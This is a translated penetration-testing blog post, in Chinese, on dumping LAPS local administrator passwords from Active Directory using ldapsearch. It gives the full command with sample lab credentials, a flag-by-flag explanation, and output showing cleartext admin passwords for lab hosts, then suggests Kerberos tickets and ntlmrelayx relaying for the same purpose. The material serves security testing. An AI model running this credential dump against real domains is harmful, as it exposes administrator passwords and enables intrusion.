2017-07-27 15:33:54
阅读:797次
点赞(0)
收藏
来源: room362.com
作者:for_while
译者:for_while
预估稿费:50 RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
前言
如果你曾经对使用LAPS的组织做过渗透测试,你应该知道在安全方面使用随机本地管理员密码(LAPS)是最佳的解决方案。
使用ldapsearch来dump域中的LAPS密码
LAPS将其信息存储在Active Directory中:
到期时间: ms-Mcs-AdmPwdExpirationTime: 131461867015760024
明文存储的密码:ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(
在LAPS首次出现时,Active Directory中的任何用户都可以读取它。不过Microsoft现在已经修复了这个漏洞,您现在必须拥有All extended rights对象的权限或Active Directory的完全控制权,才能执行此操作。
感谢Meatballs,提供了一个Metasploit模块:enum_laps.rb。但是,不幸的是,在渗透测试的过程中我们并不总能使用 Meterpreter 会话来运行该模块。不过使用ldapsearch(包含在ldapscripts Debian/Ubuntu 中的软件包中)也能实现和上述模块相同的查询。一下为一个运行示例:
ldapsearch-x-h192.168.80.10-D\ "helpdesk"-wASDqwe123-b"dc=sittingduck,dc=info"\ "(ms-MCS-AdmPwd=*)"ms-MCS-AdmPwd下面解释下这条命令
让我们打破这个:
-x- 使用基本身份验证
-h 192.168.80.10- 连接到ldap的域控制器
-D "helpdesk" -w ASDqwe123-以helpdesk(用户名),ASDqwe123(密码)登录
-b "dc=sittingduck,dc=info"- 这将加载整个域的基本LDAP对象。
"(ms-MCS-AdmPwd=*)"- 过滤掉我不能查看ms-MCS-AdmPwd的值的对象。(如果你拥有查看该管理员密码的用户权限,则会显示该密码。)
ms-MCS-AdmPwd- 只显示ms-MCS-AdmPwd对象(默认情况下包含对象名称和DN,以便您知道它所属的主机)
命令执行示例:
$ldapsearch-x-h192.168.80.10-D"helpdesk"-wASDqwe123-b"dc=sittingduck,dc=info""(ms-MCS-AdmPwd=*)"ms-MCS-AdmPwd #extendedLDIF # #LDAPv3 #base<dc=sittingduck,dc=info>withscopesubtree #filter:(ms-MCS-AdmPwd=*) #requesting:ms-MCS-AdmPwd # #DC1,DomainControllers,sittingduck.info dn:CN=DC1,OU=DomainControllers,DC=sittingduck,DC=info ms-Mcs-AdmPwd:2F1i/++N0H+G]{Y&,F #SDCLIENT_DAWIN7,LabComputers,Lab,sittingduck.info dn:CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info ms-Mcs-AdmPwd:8CDR4,2UE8BA{zw2@RR #SD_WSUS_2012,LabComputers,Lab,sittingduck.info dn:CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info ms-Mcs-AdmPwd:+3!UY5@g9B.64RV2z/T #WIN-PM0ID6F0AHN,LabComputers,Lab,sittingduck.info dn:CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info ms-Mcs-AdmPwd:%v!e#7S#{s})+y2yS#( #searchreference ref:ldap://research.sittingduck.info/DC=research,DC=sittingduck,DC=info #searchreference ref:ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,D C=info #searchreference ref:ldap://DomainDnsZones.sittingduck.info/DC=DomainDnsZones,DC=sittingduck,D C=info #searchreference ref:ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info #searchresult search:2 result:0Success现在,仅仅只有本地admin密码并不能确定LDPS就开启了,然而你还是可以执行一些后续的操作。
后记
你可以使用Kerberos进行身份验证(即:Golden/Silver 票据)
因为windows没有(据我所知)限制只能在域控上登录LDAP连接(可能在未来推出),使用一点编码技术可以让ntlmrelayxdump LAPS密码。
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://room362.com/post/2017/dump-laps-passwords-with-ldapsearch/
